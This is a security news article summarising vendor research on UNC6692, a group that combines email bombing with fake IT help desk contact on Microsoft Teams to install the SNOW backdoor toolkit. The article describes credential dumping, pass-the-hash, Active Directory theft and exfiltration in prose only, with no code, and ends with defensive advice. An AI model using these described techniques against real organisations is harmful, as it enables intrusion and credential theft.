Security researchers have uncovered a previously unknown threat activity group designated as UNC6692, which has been conducting targeted attacks using social engineering tactics deployed through Microsoft Teams messaging platform. The campaign focuses on distributing a specialized malware toolkit designed to establish persistent access to corporate networks.
According to findings released by Google-owned Mandiant, the threat actors behind UNC6692 have adopted a sophisticated multi-stage approach that combines email-based distraction tactics with impersonation of legitimate IT support personnel to manipulate victims into installing malicious software.
The Multi-Phase Attack Strategy
The attack sequence begins with an intentional barrage of unwanted messages sent to a targeted organization’s email system. This initial flooding phase creates confusion and concern among employees, establishing a psychological foundation for the subsequent social engineering attempt.
Following the email bombardment phase, threat actors reach out to the affected individual through Microsoft Teams. The message purports to originate from the organization’s internal IT department and offers assistance in resolving the email flooding problem. The attackers craft these messages to appear legitimate, complete with professional language and apparent understanding of the technical issue affecting the victim.
This particular combination of techniques—email bombing followed by Teams-based help desk impersonation—represents a continuation of methodologies previously associated with the Black Basta ransomware affiliate network. Despite Black Basta’s shutdown of organized operations in early 2025, the tactical playbook has remained effective and continues to be deployed by multiple threat groups.
Shifting Focus Toward Senior Leadership
Research conducted by ReliaQuest reveals an important evolution in targeting patterns. The same attack methodology has increasingly been directed toward executive-level personnel and senior management within organizations, rather than general employees.
Between March 1 and April 1, 2026, 77% of observed attack attempts specifically targeted senior-level employees—representing a significant increase from the 59% rate documented during the initial two months of 2026. According to ReliaQuest security researchers John Dilgen and Alexa Feminella, this shift demonstrates how effective attack methodologies can remain viable long after the original threat group dissolves.
The attackers leverage these conversations to convince victims to install remote administration tools such as Quick Assist or Supremo Remote Desktop applications. Once installed, these legitimate tools are weaponized by attackers to deliver additional malicious payloads and establish interactive control over the compromised system.
ReliaQuest’s analysis documented cases where initial contact attempts occurred within just 29 seconds of each other, suggesting highly coordinated operations designed to catch victims before they could verify the legitimacy of incoming messages.
Technical Analysis of the Malware Chain
The attack methodology documented by Mandiant researchers reveals a more technically sophisticated variation. Instead of requesting direct installation of remote management tools, victims are directed to click on a fraudulent link embedded within the Teams conversation. The link appears to lead to a legitimate software patch designed to remediate the spam email problem.
When activated, the malicious link initiates the download of an AutoHotkey script sourced from threat actor-controlled Amazon Web Services (AWS) infrastructure. The phishing interface is deceptively labeled “Mailbox Repair and Sync Utility v2.1.5” to maintain the illusion of legitimacy.
The downloaded script functions as a reconnaissance tool while simultaneously deploying SNOWBELT, a malicious browser extension specifically designed for the Chromium-based Microsoft Edge browser. The installation process launches Edge in hidden mode while employing the “–load-extension” parameter to inject the unauthorized extension.
Mandiant researchers JP Glab, Tufail Ahmed, Josh Kelley, and Muhammad Umair noted that the attackers implemented sophisticated safeguards within the installation script. The gatekeeper script verifies that the target system matches intended parameters before deploying the payload, simultaneously implementing evasion techniques to bypass automated security analysis systems.
The script incorporates browser verification functionality—if the victim system does not have Microsoft Edge installed, the phishing page displays a persistent warning message directing the user to install the required browser.
The SNOW Malware Toolkit Components
The SNOW malware ecosystem represents a modular toolkit where individual components work in coordination to achieve the attacker’s objectives. Each element serves a specialized function within the broader attack infrastructure:
SNOWBELT Component: This JavaScript-based backdoor receives commands through the attacker’s command infrastructure and functions as an intermediary, relaying execution requests to other components within the toolkit. Its primary function involves maintaining persistent access and routing attacker communications.
SNOWGLAZE Component: Operating as a Python-based tunneling utility, SNOWGLAZE establishes secure encrypted communication channels using WebSocket protocol between the compromised internal network and the attacker’s remote infrastructure. This component authenticates the tunnel connection and ensures encrypted data transmission.
SNOWBASIN Component: Functioning as a permanent backdoor application, SNOWBASIN enables remote command execution capabilities using standard Windows command interpreters. The component supports screenshot capture functionality, file upload and download operations, and self-termination features. SNOWBASIN operates as a local HTTP service, typically binding to ports 8000, 8001, or 8002.
The phishing page also includes a configuration panel featuring a conspicuous “Health Check” button. When activated, this button prompts users to provide their email account credentials, ostensibly for authentication verification purposes. In reality, any credentials entered are captured and transmitted to another attacker-controlled AWS storage location for harvesting and analysis.
Post-Compromise Operational Activities
Following successful initial system compromise, UNC6692 operators conduct a series of coordinated post-exploitation activities designed to expand their network footprint and extract valuable organizational data:
Network Reconnaissance and Lateral Movement: Attackers deploy Python-based scanning tools targeting standard Windows network service ports (135, 445, and 3389). These ports typically correspond to essential Windows management services that enable lateral movement across network infrastructure. Using the SNOWGLAZE tunneling system, operators establish PsExec sessions to additional systems and initiate Remote Desktop Protocol connections to backup servers.
Privilege Escalation Techniques: Threat actors leverage locally available administrator accounts to extract LSASS memory—a critical Windows system component containing authentication credentials and session tokens. The attack employs Windows Task Manager as the extraction mechanism, avoiding suspicious command-line activity that might trigger security monitoring.
Credential Reuse and Domain Controller Access: Employing Pass-The-Hash techniques, attackers utilize harvested password hashes from elevated user accounts to authenticate directly to domain controllers without requiring plaintext passwords. This technique enables movement across network security boundaries while minimizing detection risk.
Sensitive Data Extraction: Operators download and execute FTK Imager, a forensic acquisition tool, to capture system snapshots including Active Directory databases—the core authentication and authorization system for Windows environments. Extracted data is written to standard user directories (typically Downloads folder) and subsequently exfiltrated using LimeWire, a cloud-based file sharing platform.
Strategic Use of Legitimate Infrastructure
A critical element of UNC6692’s operational success involves deliberate abuse of mainstream cloud service providers for multiple attack phases. By hosting malicious components on Amazon Web Services and similar trusted platforms, attackers can circumvent network security filtering systems that typically permit traffic to these well-established services.
Mandiant researchers emphasized this dimension: “A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic.”
This approach creates a significant detection challenge for defensive security teams, as distinguishing between legitimate organizational cloud usage and attacker-controlled infrastructure becomes substantially more difficult.
Parallel Campaigns and Emerging Variants
Additional research from Cato Networks has identified a related campaign utilizing similar help desk impersonation tactics but deploying different malware payloads. This parallel operation uses Microsoft Teams meetings to convince victims to execute a WebSocket-based backdoor dubbed PhantomBackdoor, delivered through obfuscated PowerShell scripts retrieved from external servers.
Cato Networks security researchers noted: “This incident shows how help desk impersonation delivered through a Microsoft Teams meeting can replace traditional phishing and still lead to the same outcome: staged PowerShell execution followed by a WebSocket backdoor.”
The emergence of multiple independent campaigns employing similar social engineering methodologies suggests that the tactics have achieved widespread adoption across the threat actor community, establishing a de facto standard approach for initial compromise.
Microsoft’s Perspective on the Threat Landscape
Microsoft has publicly acknowledged the escalating abuse of its Teams collaboration platform by threat actors. The company has warned that attackers are initiating cross-organizational Teams communications to establish interactive system control through remote management tools including Quick Assist.
Following successful establishment of interactive access, attackers conduct reconnaissance operations and deploy connectivity agents designed to establish encrypted outbound connections to attacker infrastructure. Subsequently, attackers deploy fallback remote access mechanisms using Level RMM to maintain persistence if original artifacts are discovered and neutralized.
The complete operational sequence involves using native Windows administrative protocols, particularly Windows Remote Management (WinRM), to conduct credential-based lateral movement. This approach enables attackers to pivot toward high-value targets including domain controllers and critical infrastructure systems.
Microsoft stated: “This access pathway might be used to perform credential-backed lateral movement using native administrative protocols such as Windows Remote Management (WinRM), allowing threat actors to pivot toward high-value assets including domain controllers.”
Defense and Mitigation Considerations
Cato Networks recommends that defensive security teams implement several critical protective measures:
Organizations should establish formal help desk verification workflows requiring multi-factor authentication for all remote access requests. External collaboration platform communications should be subject to stringent control policies, with screen-sharing capabilities restricted by default. PowerShell execution policies should be enforced to restrict unauthorized script execution, and logging should be enhanced to detect suspicious PowerShell usage patterns.
The campaign demonstrates the effectiveness of combining multiple attack vectors—psychological manipulation through email flooding, impersonation of trusted internal personnel, exploitation of legitimate remote management tools, and abuse of mainstream cloud infrastructure—to achieve comprehensive network compromise.
Evolution of Attack Tactics
The UNC6692 campaign underscores an important evolution in modern cybersecurity threats. Rather than deploying novel malware or zero-day vulnerabilities, threat actors achieve remarkable success by weaponizing legitimate tools, platforms, and user expectations.
The strategy illustrates how attackers can effectively eliminate the security advantage traditionally provided by legitimate software. When threat actors can deliver malicious payloads through trusted platforms and use management tools originally designed for legitimate support functions, organizational defenses must fundamentally adapt.
Security teams are increasingly recognizing that collaboration platforms—Microsoft Teams, Slack, and similar tools—constitute first-class attack surfaces requiring equivalent defensive investment as traditional network perimeter defenses.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
